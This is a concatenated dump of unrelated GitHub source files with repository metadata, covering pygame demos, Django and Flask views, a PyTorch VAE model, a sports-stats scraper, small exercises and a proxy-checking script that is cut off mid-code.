Set a referance to the image rect.\n self.rect = self.image.get_rect()\n \n # Set speed vector of player\n self.change_x = 0\n self.change_y = 0\n \n # List of sprites we can bump against\n self.level = None\n\n # update Mario\n def update(self):\n # Gravity\n self.calc_grav()\n\n # run only if on ground\n if self.running == True and self.jumping == False and self.crouching == False:\n self.walk()\n\n # see if running\n if abs(self.change_x) > 0 and not self.jumping:\n self.running = True\n self.standing = False\n\n else:\n self.running = False\n self.standing = True\n\n # Move left/right\n self.rect.x += self.change_x\n\n # See if we hit anything (x direction)\n block_hit_list = pygame.sprite.spritecollide(self, self.level.platform_list, False)\n for block in block_hit_list:\n # If we are moving right,\n # set our right side to the left side of the item we hit\n if self.change_x > 0:\n self.rect.right = block.rect.left\n elif self.change_x < 0:\n # Otherwise if we are moving left, do the opposite.\n self.rect.left = block.rect.right\n \n # see if on ground\n if self.change_y == 0:\n self.jumping = False\n\n # display standing sprite\n if self.running == False and self.jumping == False:\n self.stand()\n\n # display standing sprite\n if self.crouching == True:\n self.crouch()\n self.rect.y += self.change_y\n\n else: # Move up/down\n self.rect.y += self.change_y\n\n if self.jumping:\n # determine what sprite to use for jumping\n if self.crouching:\n if self.direction == \"R\":\n self.image = self.bigR_frames[self.crouchFrame]\n else:\n self.image = self.bigL_frames[self.crouchFrame] \n\n elif self.direction == \"R\":\n self.image = self.bigR_frames[self.jumpFrame]\n else:\n self.image = self.bigL_frames[self.jumpFrame]\n \n # Check and see if we hit any platforms (y direction)\n block_hit_list = pygame.sprite.spritecollide(self, self.level.platform_list, False)\n for block in block_hit_list:\n \n # Reset our position based on the top/bottom of the object.\n if self.change_y > 0:\n self.rect.bottom = block.rect.top\n self.jumping = False\n elif self.change_y < 0:\n self.rect.top = block.rect.bottom\n \n # Stop our vertical movement\n self.change_y = 0\n \n def calc_grav(self):\n \"\"\" Calculate effect of gravity. \"\"\"\n if self.change_y == 0:\n self.change_y = 1\n else:\n self.change_y += .35\n \n # See if we are on the ground\n if self.rect.y >= constants.SCREEN_HEIGHT - self.rect.height and self.change_y >= 0:\n self.change_y = 0\n self.rect.y = constants.SCREEN_HEIGHT - self.rect.height\n\n\n # standing function\n def stand(self):\n self.frames = self.decideFrames()\n self.image = self.frames[0]\n\n # running function\n def walk(self):\n # change frame based on direction\n self.frames = self.decideFrames()\n\n # control animation speed with timer and frame direction\n self.timer += 1\n\n if self.timer % 4 == 0:\n self.curFrame += 1\n\n print (self.curFrame)\n\n # see if move frame limit (3) reached for either direction\n if self.curFrame > self.moveFrame:\n self.curFrame = 0\n\n self.image = self.frames[self.curFrame]\n\n def jump(self):\n\n # move up 2 pixels for start of jump\n self.jumping = True\n self.rect.y += 2\n\n # add platforms to list to check if open space above and end first part of jump\n platform_hit_list = pygame.sprite.spritecollide(self, self.level.platform_list, False)\n self.rect.y -= 2\n \n # if no platforms hit, jump up\n if len(platform_hit_list) > 0 or self.rect.bottom >= constants.SCREEN_HEIGHT:\n self.change_y = -10\n \n # Player-controlled movement:\n def go_left(self):\n \"\"\" Called when the user hits the left arrow. \"\"\"\n self.direction = \"L\"\n self.running = True\n while self.change_x > -4:\n self.change_x -= .1\n\n\n def go_right(self):\n \"\"\" Called when the user hits the right arrow. \"\"\"\n self.direction = \"R\"\n self.running = True\n while self.change_x < 4:\n self.change_x += .1\n\n \n def stop(self):\n \"\"\" Called when the user lets off the keyboard. \"\"\"\n self.running = False\n self.change_x = 0\n\n def crouch(self):\n # crouch based on direction\n if self.direction == \"R\":\n self.image = self.bigR_frames[self.crouchFrame]\n else:\n self.image = self.bigL_frames[self.crouchFrame]\n\n self.change_y += 20\n\n # function that decides what frames to be using for anything\n def decideFrames(self):\n # check based on direction and size\n if self.direction == \"R\":\n if self.big == True:\n return self.bigR_frames\n else:\n return self.smallR_frames\n\n else:\n if self.big == True:\n return self.bigL_frames\n else:\n return self.smallL_frames\n\n\n","repo_name":"ItsArmin/MarioGame","sub_path":"mario.py","file_name":"mario.py","file_ext":"py","file_size_in_byte":7500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"10138007815","text":"from Clases.Persona import Persona\nfrom Clases.Agenda import Agenda\n\nmanuel = Persona(\"Manuel\", \"Rojas\", \"manuel@sucorreo.cl\") #Instanciar un objeto\nmanuel.apellidos = \"Rojas Olivares\"\nmanuel.edad = 10\nmanuel.mostrar()\nmanuel.caminar(29)\nmanuel.caminar(50)\n\nprint('Crear agenda y agregar contacto')\nmiagenda = Agenda()\nmiagenda.AgregarPersona(manuel)\nmiagenda.MostrarMisContactos()\n\nprint('Agregar nuevo contacto a la agenda')\npablo = Persona(\"Pablo\", \"Godoy\", \"pablo@sucorreo.cl\")\nmiagenda.AgregarPersona(pablo)\nmiagenda.MostrarMisContactos()\n\nprint('Buscar contacto por email: manuel@sucorreo.cl')\nmiagenda.BuscarPorEmail(\"manuel@sucorreo.cl\")\n\nprint('Elminar contacto por su email: manuel@sucorreo.cl')\nmiagenda.EliminarPorEmail(\"manuel@sucorreo.cl\")\n\nprint('Mostrar contenido de la agenda')\nmiagenda.MostrarMisContactos()\n\nprint('Este es mi programa principal')","repo_name":"bastianms/nsideas.PythonTests","sub_path":"clinica/ejemploClase/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"40298648189","text":"from django.shortcuts import render, redirect\nfrom django.contrib import messages\nfrom django.core.mail import send_mail\nfrom .models import Contact\n\ndef contact(request):\n if request.method == 'POST':\n offering_id = request.POST['offering_id']\n offering = request.POST['offering']\n name = request.POST['name']\n email = request.POST['email']\n phone = request.POST['phone']\n message = request.POST['message']\n user_id = request.POST['user_id']\n affiliate_email = request.POST['affiliate_email']\n\n # Check if user has made inquiry already\n if request.user.is_authenticated:\n user_id = request.user.id\n has_contacted = Contact.objects.all().filter(offering_id=offering_id, user_id=user_id)\n if has_contacted:\n messages.error(request, 'You have already made an inquiry for this offering')\n return redirect('/offerings/'+offering_id)\n\n contact = Contact(offering=offering, offering_id=offering_id, name=name, email=email, phone=phone, message=message, user_id=user_id )\n\n contact.save()\n\n #send email\n send_mail(\n 'Investment Offering Inquiry',\n 'There has been an inquiry for ' + offering + '. Sign into the admin panel for more info.'\n 'wealthyalchemy@gmail.com'\n ['affiliate_email'],\n fail_silently=False\n )\n\n messages.success(request, 'Your request has been submitted, a affiliate will get back to you soon')\n return redirect('/offerings/'+offering_id)","repo_name":"Anthony-Mendola/WealthAlchemy","sub_path":"contacts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"20080202176","text":"\"\"\"\n Pygame base template for opening a window\n\n Sample Python/Pygame Programs\n Simpson College Computer Science\n http://programarcadegames.com/\n http://simpson.edu/computer-science/\n\n Explanation video: http://youtu.be/vRB_983kUMc\n\"\"\"\n\nimport pygame\nimport random\n\n# Define some colors\nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\nGREEN = (0, 255, 0)\nRED = (255, 0, 0)\nBLUE = (0, 0, 255)\nGREY = (127, 127, 127)\nLIYA = (150,180,250)\nSEE = (180,220,180)\nKV = (34,134,23)\nOW = (173,27,95)\nSK=(89,162,237)\n\n\npygame.init()\n\n\n\n\n# Set the width and height of the screen [width, height]\nSCREEN_WIDTH = 700\nSCREEN_HEIGHT = 500\n\nscreen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))\n\npygame.display.set_caption(\"Ball Game\")\n\n# Loop until the user clicks the close button.\ndone = False\n\n# Used to manage how fast the screen updates\nclock = pygame.time.Clock()\n\n\npossible_ball_colors = [BLACK, WHITE, GREEN, RED, BLUE, GREY, LIYA, KV, OW, SK]\n\n\n# Ball 1\nx_speed = random.randint(-10, 10)\ny_speed = random.randint(-10, 10)\n\nx_location = int(SCREEN_WIDTH/2)\ny_location = int(SCREEN_HEIGHT/2)\n\n\nball_size = random.randi\n# Ball 2nt(10, 30)\n\nXSPEED=3\nYSPEED=3\nSIZE=30\nL=SIZE\nXC=int(SCREEN_WIDTH/2)\nYC=int(SCREEN_HEIGHT/2)\ncolor=[BLACK,WHITE,GREEN,RED,BLUE,GREY,LIYA,KV,OW,SK]\nindex=6\n\n\n# -------- Main Program Loop -----------\nwhile not done:\n # --- Main event loop\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n done = True\n\n\n # --- Game logic should go here\n\n XC+=XSPEED\n YC+=YSPEED\n\n # --- Screen-clearing code goes here\n\n # Here, we clear the screen to white. Don't put other drawing commands\n # above this, or they will be erased with this command.\n\n # If you want a background image, replace this clear with blit'ing the\n # background image.\n screen.fill(SEE)\n\n # --- Drawing code should go here\n ball_color = random.choice(possible_ball_colors) # This is outside because of variable scoping.\n\n\n # Ball 1 \n pygame.draw.circle(screen, ball_color, [x_location, y_location], ball_size)\n\n\n if x_location >= SCREEN_WIDTH - ball_size or x_location < ball_size:\n x_speed = x_speed * -1\n\n if y_location >= SCREEN_HEIGHT - ball_size or y_location < ball_size:\n y_speed = y_speed * -1\n\n\n x_location += x_speed\n y_location += y_speed\n\n #Ball 2\n\n pygame.draw.circle(screen,color[index],[XC,YC],SIZE)\n if XC>=SCREEN_WIDTH-L or XC<=L:\n XSPEED=-XSPEED\n index=random.randint(0,6)\n SIZE=random.randint(20,80)\n if YC>=SCREEN_HEIGHT-L or YC<=L:\n YSPEED=-YSPEED \n index=random.randint(0,6)\n SIZE=random.randint(20,80)\n\n\n # --- Go ahead and update the screen with what we've drawn.\n pygame.display.flip()\n\n # --- Limit to 60 frames per second\n clock.tick(60)\n\n# Close the window and quit.\npygame.quit()\nexit() # Needed when using IDLE\n","repo_name":"ZhuLiya/2016SIP","sub_path":"week3/ball.py","file_name":"ball.py","file_ext":"py","file_size_in_byte":2885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"25390415413","text":"# -*- coding: utf-8 -*-\nimport os, datetime, md5\nfrom django import http\nfrom django.conf import settings\nfrom django.views.generic.simple import direct_to_template\nfrom pytils.translit import translify\nfrom django.views.decorators.csrf import csrf_exempt\n\ntry:\n from PIL import Image\nexcept ImportError:\n import Image\nfrom django.contrib.auth.decorators import login_required\nfrom apps.utils.utils import crop_image\nfrom django.db.models import get_model\nfrom decimal import Decimal\nfrom urllib2 import urlopen\nfrom pytils.translit import slugify\nfrom django.core.files import File\nfrom django.core.files.temp import NamedTemporaryFile\nfrom xml.dom.minidom import *\nfrom apps.products.models import Category, Product, FeatureValue\n\ndef handle_uploaded_file(f, filename, folder):\n name, ext = os.path.splitext(translify(filename).replace(' ', '_'))\n hashed_name = md5.md5(name + datetime.datetime.now().strftime(\"%Y%m%d%H%M%S\")).hexdigest()\n path_name = settings.MEDIA_ROOT + '/uploads/' + folder + hashed_name + ext\n destination = open(path_name, 'wb+')\n\n for chunk in f.chunks():\n destination.write(chunk)\n destination.close()\n return '/media/uploads/' + folder + hashed_name + ext\n\n\n@csrf_exempt\ndef upload_img(request):\n if request.user.is_staff:\n if request.method == 'POST':\n url = handle_uploaded_file(request.FILES['file'], request.FILES['file'].name, 'images/')\n\n #Resizing\n size = 650, 650\n im = Image.open(settings.ROOT_PATH + url)\n imageSize = im.size\n if (imageSize[0] > size[0]) or (imageSize[1] > size[1]):\n im.thumbnail(size, Image.ANTIALIAS)\n im.save(settings.ROOT_PATH + url, \"JPEG\", quality=100)\n return http.HttpResponse('{\"filelink\":\"%s\"}' % url)\n\n else:\n return http.HttpResponse('error')\n else:\n return http.HttpResponse('403 Forbidden. Authentication Required!')\n\n\n@csrf_exempt\ndef upload_file(request):\n if request.user.is_staff:\n if request.method == 'POST':\n url = handle_uploaded_file(request.FILES['file'], request.FILES['file'].name, 'files/')\n url = '{\"filelink\":\"%s\",\"filename\":\"%s\"}' % (url, request.FILES['file'].name)\n return http.HttpResponse(url)\n else:\n return http.HttpResponse('403 Forbidden. Authentication Required!')\n\n\n@login_required()\n@csrf_exempt\ndef crop_image_view(request, app_name, model_name, id):\n model = get_model(app_name, model_name)\n output_size = model.crop_size\n if request.method != \"POST\":\n try:\n image = model.objects.get(pk=id).image\n return direct_to_template(request, 'admin/crop_image.html', locals())\n except model.DoesNotExist:\n raise http.Http404('Object not found')\n else:\n original_img = model.objects.get(pk=id)\n crop_image(request.POST, original_img, output_size)\n\n next = request.path.replace('crop/', '')\n return http.HttpResponseRedirect(next)\n\n\ndef upload_xml(request):\n if request.user.is_staff:\n if request.method == 'POST':\n f = request.FILES['file']\n filename = request.FILES['file'].name\n name, ext = os.path.splitext(translify(filename).replace(' ', '_'))\n newname = '/uploads/' + 'xml_tmp' + ext\n if ext == '.xsql' or ext == '.xml':\n # удаляем старый файл\n oldfile = 'xml_tmp'\n for root, dirs, files in os.walk(settings.MEDIA_ROOT + '/uploads/', ):\n for filename in files:\n name, ext = os.path.splitext(translify(u'%s' % filename).replace(' ', '_'))\n if name == 'xml_tmp':\n oldfile = '/uploads/' + filename\n try:\n os.remove(settings.MEDIA_ROOT + oldfile)\n except OSError:\n oldfile = False\n # загружаем новый\n path_name = settings.MEDIA_ROOT + newname\n destination = open(path_name, 'wb+')\n for chunk in f.chunks():\n destination.write(chunk)\n destination.close()\n\n # распарсиваем:\n f = parse(path_name)\n\n rows_array = f.getElementsByTagName('product')\n all_products = Product.objects.all()\n parsed = ''\n if rows_array: # если есть элемент ROW - то проверяем что пришло - товар или категория\n for z in rows_array:\n xml_code = z.getElementsByTagName('code')[0].firstChild.nodeValue\n try:\n xml_art = z.getElementsByTagName('art')[0].firstChild.nodeValue\n except:\n xml_art = u''\n xml_title = z.getElementsByTagName('title')[0].firstChild.nodeValue\n try:\n xml_price = Decimal(z.getElementsByTagName('price')[0].firstChild.nodeValue)\n except:\n xml_price = 0\n try:\n xml_remainder = Decimal(z.getElementsByTagName('remainder')[0].firstChild.nodeValue)\n except:\n xml_remainder = 0\n\n try:\n change = False\n product = all_products.get(xml_id=xml_code)\n if product.art != xml_art:\n product.art = xml_art\n change = True\n if product.title != xml_title:\n product.title = xml_title\n change = True\n if product.price != xml_price:\n product.price = xml_price\n change = True\n if product.remainder != xml_remainder:\n product.remainder = xml_remainder\n change = True\n if change:\n product.save()\n except:\n product = Product(title=xml_title, art=xml_art, price=xml_price, xml_id=xml_code,\n remainder=xml_remainder)\n product.save()\n\n return http.HttpResponseRedirect('/admin/products/product/?')\n else:\n return http.HttpResponseRedirect('/admin/')\n else:\n return http.HttpResponseRedirect('/admin/')\n else:\n return http.HttpResponse('403 Forbidden. Authentication Required!')","repo_name":"wd5/2-slon-dragon","sub_path":"views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"42726365119","text":"N, K = list(map(int, input().split()))\nAttack = dict()\nDefense = dict()\nHealth = dict()\nn = 0\nfor i in range(N):\n\tA, D, H = list(map(int, input().split()))\n\tAttack[A] = n\n\tDefense[D] = n\n\tHealth[H] = n\n\tn += 1\n\nAttack = sorted(Attack.items())\nDefense = sorted(Defense.items())\nHealth = sorted(Health.items())\nAttack.reverse()\nDefense.reverse()\nHealth.reverse()\n\ns = set()\nfor i in range(K):\n\ts.add(Attack[i][1])\n\ts.add(Defense[i][1])\n\ts.add(Health[i][1])\nprint(len(s))","repo_name":"Weiguo-Jiang/Kattis-Solutions","sub_path":"iwannabe.py","file_name":"iwannabe.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"16261171343","text":"'''\nАвтомат обрабатывает натуральное число N < 256 по следующему алгоритму:\n1) Строится в��сьмибитная двоичная запись числа N.\n2) Инвертируются все разряды исходного числа, кроме последней единицы и стоящих за ней нулей (0 заменяется на 1, 1 на 0).\n3) Полученное число переводится в десятичную систему счисления.\nДля какого значения N результат работы алгоритма равен 221?\n'''\nfor n in range(1, 256):\n s = bin(n)[2:]\n s = (8 - len(s)) * '0' + s\n s1 = ''\n i = 0\n for x in range(len(s)):\n if s[x] == '1':\n i += 1\n if i == s.count('1'):\n i = x\n for x in range(0, i):\n if s[x] == '1':\n s1 += '0'\n if s[x] == '0':\n s1 += '1'\n for x in range(i, len(s)):\n s1 += s[x]\n if int(s1, 2) == 221:\n print(n)\n","repo_name":"plugarivan/ege_informatika_python","sub_path":"zadanie_5/5-26.py","file_name":"5-26.py","file_ext":"py","file_size_in_byte":1094,"program_lang":"python","lang":"ru","doc_type":"code","stars":27,"dataset":"github-code","pt":"2"} +{"seq_id":"23404520141","text":"from torch.distributions.multivariate_normal import MultivariateNormal\n\nfrom pdb import set_trace as st\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport numpy as np\nfrom torch.distributions import Normal\nimport torch.utils.data as data\nimport math\n\n\ndef quantize(x, n_bit):\n x = x * 0.5 + 0.5 # to [0, 1]\n x *= 2 ** n_bit - 1 # [0, 255] \n x = torch.floor(x + 1e-4) # [0, 255]\n return x\n\n\nclass Encoder(nn.Module):\n def __init__(self, z_dim, channel_dim):\n super().__init__()\n self.z_dim = z_dim\n self.model = nn.Sequential(\n nn.Conv2d(channel_dim, 32, 3, 1, 1),\n nn.LeakyReLU(0.2, True),\n nn.Conv2d(32, 64, 3, 2, 1),\n nn.LeakyReLU(0.2, True),\n nn.Conv2d(64, 128, 3, 2, 1),\n nn.LeakyReLU(0.2, True),\n nn.Conv2d(128, 256, 3, 2, 1),\n nn.LeakyReLU(0.2, True),\n )\n self.out = nn.Linear(256 * 4 * 4, z_dim)\n self.made = MADE((z_dim//2,), 2, hidden_size=[512, 512])\n self.prior = torch.distributions.Normal(torch.tensor(0.).cuda(), torch.tensor(1.).cuda())\n\n def forward(self, x):\n x = x.float()\n x = self.model(x)\n x = x.view(x.shape[0], -1)\n z = self.out(x)\n return z\n\n def reverse(self, epis):\n m = self.made(epis)\n mu, log_sigma = m[:, 0], m[:, 1]\n zs = (epis - mu) * torch.exp(-log_sigma)\n return zs\n\n\nclass Decoder(nn.Module):\n\n def __init__(self, z_dim, channel_dim):\n super().__init__()\n self.z_dim = z_dim\n self.channel_dim = channel_dim\n\n self.linear = nn.Linear(z_dim, 4 * 4 * 128)\n self.main = nn.Sequential(\n nn.ConvTranspose2d(128, 128, 4, 2, 1),\n nn.LeakyReLU(0.2, True),\n nn.ConvTranspose2d(128, 64, 4, 2, 1),\n nn.LeakyReLU(0.2, True),\n nn.ConvTranspose2d(64, 32, 4, 2, 1),\n nn.LeakyReLU(0.2, True),\n nn.Conv2d(32, 3, 3, 1, 1),\n )\n\n def forward(self, z):\n z = z.float()\n # x = nn.ReLU()(self.linear(z))\n x = self.linear(z)\n x = x.view(-1, 128, 4, 4) \n output = self.main(x) #[128, 3, 32, 32]\n output = torch.tanh(output)\n return output\n\n\nclass VLAE(nn.Module):\n def __init__(self, z_dim, channel_dim):\n super().__init__()\n self.encoder = Encoder(2 * z_dim, channel_dim)\n self.decoder = Decoder(z_dim, channel_dim)\n self.z_dim = z_dim\n\n def loss(self, x):\n z = self.encoder(x)\n mu, log_sigma = z.chunk(2, dim=1)\n z = torch.randn_like(mu) * torch.exp(log_sigma) + mu\n m = self.encoder.made(z)\n epis_mu, epis_log_sigma = m[:, 0], m[:, 1]\n epis = z * torch.exp(epis_log_sigma) + epis_mu #[128, 32]\n recon = self.decoder(z)\n recon_loss = ((recon-x)**2).mean(dim = 0).sum()\n\n log_p_z = epis_log_sigma.mean(dim = 0).sum() + self.encoder.prior.log_prob(epis).mean(dim = 0).sum()\n log_q_z = Normal(mu, torch.exp(log_sigma)).log_prob(z).mean(dim = 0).sum()\n kl_loss = (log_q_z - log_p_z)\n return recon_loss + kl_loss, recon_loss, kl_loss\n\n def sample(self, num, z_dim):\n epis = np.random.normal(0, 1, num * z_dim)\n epis = epis.reshape((num, z_dim))\n epis = torch.from_numpy(epis).cuda().float()\n zs = self.encoder.reverse(epis)\n pred = self.decoder(zs)\n pred = quantize(pred, 8).detach().cpu().numpy()\n return pred.astype(int)\n\n def reconstruct(self, x):\n z = self.encoder(x)\n mu, log_sigma = z.chunk(2, dim=1)\n z = torch.randn_like(mu) * (log_sigma).exp() + mu\n recon = self.decoder(z)\n recon = quantize(recon, 8).detach().cpu().numpy()\n return recon\n\n def interp(self, samples1, samples2):\n z1 = self.encoder(samples1)\n mu, log_sigma = z1.chunk(2, dim=1)\n z1 = torch.randn_like(mu) * (log_sigma).exp() + mu\n z2 = self.encoder(samples2)\n mu, log_sigma = z2.chunk(2, dim=1)\n z2 = torch.randn_like(mu) * (log_sigma).exp() + mu\n to_invert = torch.zeros(samples1.shape[0], 10, *samples1.shape[1:])\n alphas = np.arange(10)/10\n for a in range(10):\n interp = alphas[a]\n z = interp * z1 + (1-interp) * z2\n x = self.decoder(z)\n to_invert[:, a] = x\n result = to_invert.view(10 * len(samples1), *samples1.shape[1:])\n return quantize(result, 8).detach().cpu().numpy()\n\ndef preprocess(data):\n data = data.astype(float)\n rand = np.random.uniform(0, 1, data.shape) \n data += rand #[0, 256]\n data = data/128 #[0, 2]\n data -= 1 #[-1, 1]\n return data \n\ndef normalize(data):\n return (225 * (data-data.min())/(data.max() - data.min())).astype(int)\n\n","repo_name":"WMViolet/Course-Projects","sub_path":"deep_unsupervised_learning/vlae.py","file_name":"vlae.py","file_ext":"py","file_size_in_byte":4774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"11444594706","text":"from fastapi import APIRouter, Depends, HTTPException\nfrom sqlalchemy.orm import Session\nfrom starlette import status\nfrom typing import List\nfrom database import get_db\nfrom models import Program, VCAC\nfrom domain.program import program_schema, program_crud\nfrom domain.vcac.vcac_router import get_current_vcac\n\nrouter = APIRouter(\n prefix=\"/program\"\n)\n\n\n@router.post(\"/\")\ndef program_create(\n _program_create: program_schema.ProgramBase,\n db: Session = Depends(get_db),\n current_user: VCAC = Depends(get_current_vcac)\n):\n #\n program_crud.create_program(\n db, _program_create, current_user\n )\n\n\n@router.put(\"/\", status_code=status.HTTP_204_NO_CONTENT)\ndef program_update(_program_update: program_schema.ProgramBase,\n db: Session = Depends(get_db),\n current_user: VCAC = Depends(get_current_vcac)):\n program_crud.update_program(\n db=db,\n program_update=_program_update,\n vcac=current_user\n )\n\n\n@router.get(\"/list\", response_model=List[program_schema.ProgramBase])\ndef program_list(\n db: Session = Depends(get_db),\n):\n return program_crud.read_program_list(db)\n\n\n@router.get(\"/{title}\", response_model=program_schema.ProgramBase)\ndef program_read(title: str, db: Session = Depends(get_db)):\n return program_crud.read_program(\n db,\n title=title\n )\n\n\n@router.delete(\"/{title}\", status_code=status.HTTP_204_NO_CONTENT)\ndef program_delete(title: str,\n db: Session = Depends(get_db),\n current_user: VCAC = Depends(get_current_vcac)):\n program_crud.delete_program(\n db=db,\n title=title,\n vcac=current_user\n )\n\n","repo_name":"SPARCS-2023-StartUp-Hackathon-4/flit-backend-vcac","sub_path":"app/domain/program/program_router.py","file_name":"program_router.py","file_ext":"py","file_size_in_byte":1691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"12357126094","text":"from bs4 import BeautifulSoup\nfrom collections import Iterator\nimport sys, requests, time, pickle, bs4, re\nimport crawler as c\n\nstart_url = \"https://www.sports-reference.com/cbb/seasons/2018.html\"\nroot_url = 'https://www.sports-reference.com/'\n\ndef load_team_list():\n team_list = []\n with open('TournTeams.txt', 'r') as teams:\n for team in teams:\n team_list.append(team.rstrip())\n return team_list\n\ndef pull_team_data(row):\n WL = row.find('td', {'data-stat': 'win_loss_pct'}).text\n PPG = row.find('td', {'data-stat': 'pts_per_g'}).text\n OPG = row.find('td', {'data-stat': 'opp_pts_per_g'}).text\n SOS = row.find('td', {'data-stat': 'sos'}).text\n return {'Win-Loss': WL, 'pts_per_g': PPG, 'opp_pts_per_g': OPG, 'Str_of-Sched': SOS}\n\ndef search_for_team(soup, teams):\n schools = soup.find('table', {'id': 'standings'})\n rows = schools.find_all('tr')\n conf_data = []\n for row in rows:\n try:\n school = row.find('td',{'data-stat': 'school_name'})\n school_name = school.find('a').text\n if school_name in teams:\n team_data = pull_team_data(row)\n conf_data.append((school_name, team_data))\n except AttributeError as e:\n continue\n return conf_data\n \n\ndef main():\n root_res = c.get_html(start_url)\n root_soup = c.make_soup(root_res)\n confs = c.parse_for_links(root_soup,1)\n teams = load_team_list()\n data_2018 = []\n for conf in confs:\n print(conf)\n conf_res = c.get_html(conf)\n conf_soup = c.make_soup(conf_res)\n data_2018 += search_for_team(conf_soup, teams)\n print(len(data_2018))\n print(data_2018)\n with open('./pickles/2018.pickle', 'wb') as pickle_2018:\n pickle.dump(data_2018, pickle_2018)\n \n \nmain()","repo_name":"livinlefevreloca/cbb_crawler","sub_path":"scraping/2018.py","file_name":"2018.py","file_ext":"py","file_size_in_byte":1811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"31167951776","text":"# External Imports\nimport logging\nfrom flask import (\n current_app as app,\n Blueprint,\n jsonify,\n request\n)\nfrom flask_jwt_extended import (\n jwt_required\n)\n\n# Local Imports\nfrom utils.system import (\n status\n)\n\n# Blueprint Setup\nsystem_api_bp = Blueprint(\n \"system_api_bp\",\n __name__,\n url_prefix='/api/v1.0/system'\n)\n\n@system_api_bp.route(\"/status\", methods=[\"POST\"])\n@jwt_required()\ndef unseal():\n \"\"\"\n System status\n \n Returns:\n Flask Response: Flask Response Object\n \"\"\"\n # Get system data\n data=status(app)\n # Check if data is empty\n if not data:\n return jsonify(\n status=\"error\",\n message=\"No system data found\"\n ), 404\n # Return data\n return jsonify(\n status=\"ok\",\n data=data\n ), 200\n","repo_name":"ankraio/docs-flask","sub_path":"src/system/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":820,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"32784278447","text":"#!/usr/bin/env python3\n\n#time: frequency parser\n\nimport sys\n\naubio_freq_output = sys.argv[1]\n\nfreq_dict = {}\n\nwith open('classicalfreq.txt','r') as file_obj:\n for line in file_obj:\n line = line.rstrip()\n line_split = line.split()\n time = line_split[0]\n frequency = line_split[1]\n freq_dict[time] = frequency\n\n print(freq_dict)\n","repo_name":"nomascus/DJMM","sub_path":"freq_parser.py","file_name":"freq_parser.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"24949691197","text":"#!/usr/bin/env python3\nimport zlib\nimport KWH_MySQL\nimport socket\nimport sys\nsys.path.append('/kwh/lib')\n\n# load config variables from kwh.config table\nexec(open(\"/kwh/config/get_config.py\").read())\nDEBUG = int(config_var['DEBUG'])\n\n# Grab up to 100 tx_strings and tx them\nDB = KWH_MySQL.KWH_MySQL()\nrecords = DB.SELECT(\"SELECT * FROM tx_string LIMIT 100;\")\n\nfor row in records:\n if config_var['COMPRESS'] == \"1\":\n bytedata = bytearray()\n bytedata = zlib.compress(row[1], 6)\n\n server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n if DEBUG:\n print(config_var['DOMAIN'])\n if DEBUG:\n print(config_var['PORT'])\n server.connect((config_var['DOMAIN'], int(config_var['PORT'])))\n server.send(bytedata)\n rcv = server.recv(1024)\n server.close()\n if int(rcv) == row[0]:\n DB = KWH_MySQL.KWH_MySQL()\n sql = \"DELETE FROM kwh.tx_string WHERE timestamp = \" + str(row[0])\n result = DB.INSERT(sql)\n","repo_name":"KWH-DAS-TEAM/Datalogger","sub_path":"transceive/tcp/transmit.py","file_name":"transmit.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"2"} +{"seq_id":"1466795600","text":"from django.shortcuts import render\nfrom mainapp.models import Collections, CollectionsImg\nfrom mainapp.views import wallpaper_collections\n\n\n\ndef ajax_test(request, collection_name):\n title = 'test'\n current_wallpaper_img = CollectionsImg.objects.filter(img_collection__collection_name=collection_name)\n current_collection = Collections.objects.get(collection_name=collection_name)\n context = {'title': title,\n 'current_collection': current_collection,\n 'current_wallpaper_img': current_wallpaper_img,\n 'collections': wallpaper_collections}\n return render(request, 'testapp/test1.html', context)\n","repo_name":"mikibouns/DJANGO_PROJ","sub_path":"djangoproject/mysite/testapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"36775485252","text":"import requests\nimport MySQLdb\nimport time\ndef get_data():\n dbs =MySQLdb.connect(host=\"0.0.0.0\", user=\"user\", passwd=\"wydiisasdsd##&user\", db=\"AddressPool\", charset=\"utf8\")\n cursor=dbs.cursor()\n cursor.execute(\"SELECT * FROM address_table1 where type='https'\")\n AddressPool=cursor.fetchall()\n print(\"总共搜索到\" + str(len(AddressPool)) + \"条https类型的代理\")\n for data in AddressPool:\n verification(data,dbs=dbs)\n dbs.close()\ndef verification(data,dbs):\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.75 Safari/537.36'\n }\n proxies={\n \"http\":\"http://%s:%s\"%(data[1],data[3]),\n }\n url =\"https://www.baidu.com/\"#https://19ncc.medmeeting.org/cn\n if data[2]==\"https\":\n proxies={\n \"https\": \"https://%s:%s\" % (data[1], data[3])\n }\n 